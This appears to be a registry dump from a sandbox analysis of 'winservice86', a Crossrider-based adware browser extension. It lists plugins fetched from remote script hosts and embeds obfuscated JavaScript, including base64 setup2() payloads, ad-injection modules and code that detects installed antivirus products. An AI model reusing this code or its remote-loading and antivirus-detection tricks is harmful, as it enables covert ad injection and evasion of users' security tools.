    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "Name" = "Corporate Inc"

    [HKCU\Software\winservice86\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
    [HKCU\Software\winservice86\Plugins\275]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/275.js"

    [HKCU\Software\winservice86\Plugins\41]
    "Version" = "7"

    [HKCU\Software\winservice86\Plugins\220]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/220.js"

    [HKCU\Software\winservice86\Plugins\424]
    "Version" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\winservice86\Plugins\262]
    "Version" = "2"

    [HKCU\Software\winservice86\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\winservice86\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\winservice86\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\winservice86\Plugins\390]
    "Name" = "50pops_new_m"

    [HKCU\Software\winservice86\Plugins\339]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
    [HKCU\Software\winservice86\Manifest]
    "Version" = "43"
    "Description" = "winservice"

    [HKCU\Software\winservice86\Plugins\94]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/94.js"

    [HKCU\Software\winservice86\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI."

    [HKCU\Software\winservice86\Plugins\43]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/43.js"

    [HKCU\Software\winservice86\Plugins\246]
    "JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

    [HKCU\Software\winservice86\Plugins\180]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/180.js"

    [HKCU\Software\winservice86\Plugins\391]
    "Version" = "1"

    [HKCU\Software\winservice86\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\winservice86\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\winservice86\Installer]
    "DefaultBrowser" = "ie"
    "osName" = "XP32"

    [HKLM\SOFTWARE\Tempo]
    "(Default)" = "tempo"

    [HKCU\Software\winservice86\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\winservice86\Plugins\91]
    "Version" = "87"

    [HKCU\Software\winservice86\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\winservice86\Manifest]
    "Name" = "winservice86"

    [HKCU\Software\winservice86\Plugins\45]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/45.js"

    [HKCU\Software\winservice86\Plugins\424]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY1MzBiMWUwMjFiMjUxMTFhNGM1NzUzMGIxZTAyMWI0YTRjNTkxZDVlNWYwMjA3MTcxMTFmMGQxNzE5MWU1ZjAwMDUxYjQ0MTUxYjAyNWY0MzA2MDYwODA1MDQxYzBlMTkwMDQzMTIwYzA3NTkxYzAzM2MxOTBjMGIyZTBiMDcyOTE4MDMwMTI5NDAwNzAyNWMwOTE3MDYwMDAyMWYwOTAzMzgwNzU3MjkzNDMzMzEzOTNkM2UyMzJhMmUzMzM5MmYyMDM3MjMzZDJlMmEyZTI5MzQ1NjAwMTkxYjAzMDUxMTEzMzUwNDE0MDY0YjMxMzIzMjMxMjUyNTM4MjIyYTMyMmIzZjJlMjAyNTIzMjUyNDMxMmYzMTJlM2UyNzJmMjkzNDU2MGExODFkMTkxMDBmMDYxNzFmMTkwYzE4M2EwNDFjMDY1NzI5MzQzMzMxMzkzZDNlMjMyYTJlMzMzOTJmMmEzODNkMzkzMDJmMjYyOTNmMzkyZTMzMzEzMjU3MDIxYTA2MjIzNDVlMjkzMTJlMjMyYzM5MjUzOTM5MjczMzNjMzIzMDMzM2EyOTIyMzQzYzI5NDgyNDMzMmEyOTRiMzQyZjIwMjQyMTNlMjIzMTIzMzIyZTIyM2MzZjIwM2UyNTIyMjYzYTJlMjIzYzIzM2QyODIzM2MyMzMyMzQyZjQ1MTcxZTFkM2YwMjA3MTM1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmYzZDIxM2MyNDM3MjYzNTNjMjk0ODFlMDQwMTIzMzI1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmIzNTI1MjYyNDMyMmUzNDNjMjUzYjJmMmUyYTJlMjkzNDUyNGY1NDA2MTkwNTEzMTkyMzE5MWM0MTRjNGMwNTA1MTcxYTA1NTE1ZjRjMDU1ZDQzMTAwZTBiMGMwNDFlMDIwMTFkNDMxMjBjMDc1OTBlMDgx"

    [HKCU\Software\Crossrider]
    "Verifier" = "1a7df627a5d721883af6cb9355d58bf1"

    [HKCU\Software\winservice86\Plugins\200]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2ZDZhNGUxMTAyMWUxZjI0MWYxYjQ1NTk0YzViMWUxZTFiMDE1NzU4NDgxMTE5MTUxMzE5NDEwMjA0MWEwZTBmMGQwYjEyMGYwZTFkMWU1OTA5MDYxODU2MDA1YjQxNDE0MjAwMGYwYTE4MWMxYTAzMWMwNTQyNDY1NzU0NWM1NjI5MzUyYzIzMjIyNDM0MzEyNTNkMzMzODMwMzQzNTIzMjIyZDI4M2MzMjM1M2MyNDJmMjgyZTI3MzMyNjU5MzUzMDM1MjIzYTI2MmEyMjI2Mjk1NTFmMTAxZjAzMDkwNjFlMzcxNzA3MGE0YzMyMjgyNDMxMjMyYTI1MzgyNjM1MjgyNTM4MjIzYzI5MjkyNDJlM2MyODI4Mzg0MTQwNzM3ZjQ4MDcwNTE5MDcxNDM2MWUxNTU0NTA0ZjUzMDUwMzEzMTMxZjQzNTk0NTFkMDQwMTEyMTQ0ZDFmMTAxYjAzMDMxMDFmMTMwMjAyMDAwYTU4MDQwYTA1NDIwMTU2NGQ1YzU2MDEwMjA2MDUwODFiMGUxMDE4NTY0NzVhNTg0MTQyMjgzODIwM2UzNjI1MzkzZDM4MjkzMjM1M2MyOTIxMjIyZjIxMzUyODMzMzgzMDM5M2IyOTIzMmIyZTMyNTgzODNjMjgzNjNiMmIyNjNmMzIyODU4MTMwZDBiMDIwNDBhMDMyMzE2MGEwNjUxMjYyOTI5M2QzZTNlMjQzNTJhMjgzYzI0MzUyZTIxM2QyODI5MjIyMTNjMjkzNTRkNWQ2NzdlNDUxMzAwMGMxMTAzMDEzODA5NTU1ZDQzNWU0OTQ2NjAxMg==', 'wgclyvjoqm'); }"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
    "AppPath" = "%Program Files%\winservice86"

    [HKCU\Software\winservice86\Plugins\339]
    "URL" = "http://js.newcloudrack.com/plugins/mins/339.js"

    [HKCU\Software\winservice86\Plugins\78]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/78.js"

    [HKCU\Software\winservice86\Plugins\380]
    "Version" = "1"

    [HKCU\Software\winservice86\Plugins\273]
    "Name" = "aedgency_back_button_m"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\winservice86\Plugins\230]
    "Version" = "7"

    [HKLM\SOFTWARE\winservice86\Installer]
    "BundledIe" = "1"

    [HKCU\Software\winservice86\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\winservice86\Plugins\345]
    "Version" = "47"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "DisplayName" = "winservice86"

    [HKCU\Software\winservice86\Plugins\184]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/184.js"

    [HKCU\Software\winservice86\Plugins\17]
    "Name" = "jQuery"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
    "Verifier" = "1a7df627a5d721883af6cb9355d58bf1"

    [HKCU\Software\winservice86\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

    [HKCU\Software\winservice86\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\winservice86\Plugins\2]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\184]
    "Version" = "10"

    [HKLM\SOFTWARE\winservice86\Installer]
    "BundledAddCh" = "1"

    [HKCU\Software\winservice86\Plugins\38]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/38.js"

    [HKCU\Software\winservice86\Plugins\339]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYw"

    [HKCU\Software\winservice86\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\winservice86\Plugins\40]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/40.js"

    [HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
    "AuCheckPeriodMs" = "21600000"

    [HKCU\Software\winservice86\Plugins\9]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\winservice86\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActic"

    [HKCU\Software\winservice86\Plugins\345]
    "URL" = "http://js.newcloudrack.com/plugins/mins/345.js"

    [HKCU\Software\winservice86\Plugins\78]
    "Version" = "5"

    [HKCU\Software\winservice86\Plugins\93]
    "Version" = "13"

    [HKCU\Software\winservice86\Plugins\230]
    "Name" = "revizer_ws_dynamic_b2b_2_m"

    [HKCU\Software\winservice86\Plugins\195]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/195.js"

    [HKCU\Software\winservice86\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

    [HKCU\Software\winservice86\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\winservice86\Plugins\128]
    "Version" = "7"

    [HKCU\Software\winservice86\Installer]
    "AdditionalInfo" = "{""asw"":[0, 1073750528, 0],""browser_name"":""ie""

    [HKCU\Software\winservice86\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\winservice86\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\winservice86\Plugins\390]
    "URL" = "http://js.newcloudrack.com/plugins/mins/390.js"

    [HKCU\Software\winservice86\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\winservice86\Plugins\42]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/42.js"

    [HKCU\Software\winservice86\Plugins\14]
    "Version" = "11"

    [HKCU\Software\winservice86\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\winservice86\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\winservice86\Plugins\39]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/39.js"

    [HKCU\Software\winservice86\Plugins\289]
    "Name" = "covus_logos_m"

    [HKCU\Software\winservice86\Plugins\354]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"

    [HKCU\Software\winservice86\Manifest]
    "PublisherName" = "Corporate Inc"
    "Manifest" = "NA"
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\winservice86\Plugins\390]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }"

    [HKCU\Software\winservice86\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\winservice86\Plugins\376]
    "URL" = "http://js.newcloudrack.com/plugins/mins/376.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\winservice86\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\winservice86\Plugins\180]
    "Version" = "12"

    [HKCU\Software\winservice86\Plugins\311]
    "URL" = "http://js.newcloudrack.com/plugins/mins/311.js"

    [HKCU\Software\winservice86\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars1"

    [HKCU\Software\winservice86\Plugins\40]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\289]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
    [HKCU\Software\winservice86\Plugins\193]
    "Version" = "9"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\winservice86\Plugins\391]
    "URL" = "http://js.newcloudrack.com/plugins/mins/391.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\winservice86\Plugins\380]
    "URL" = "http://js.newcloudrack.com/plugins/mins/380.js"

    [HKCU\Software\winservice86\Plugins\391]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }"

    [HKCU\Software\winservice86\Plugins\354]
    "JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

    [HKCU\Software\Crossrider]
    "Bic" = "8D4C23D6A4134239976F389726A57621IE"

    [HKCU\Software\winservice86\Plugins\275]
    "Name" = "pricedetect_sidebar_small_m"

    [HKCU\Software\winservice86\Plugins\47]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/47.js"

    [HKCU\Software\winservice86\Plugins\44]
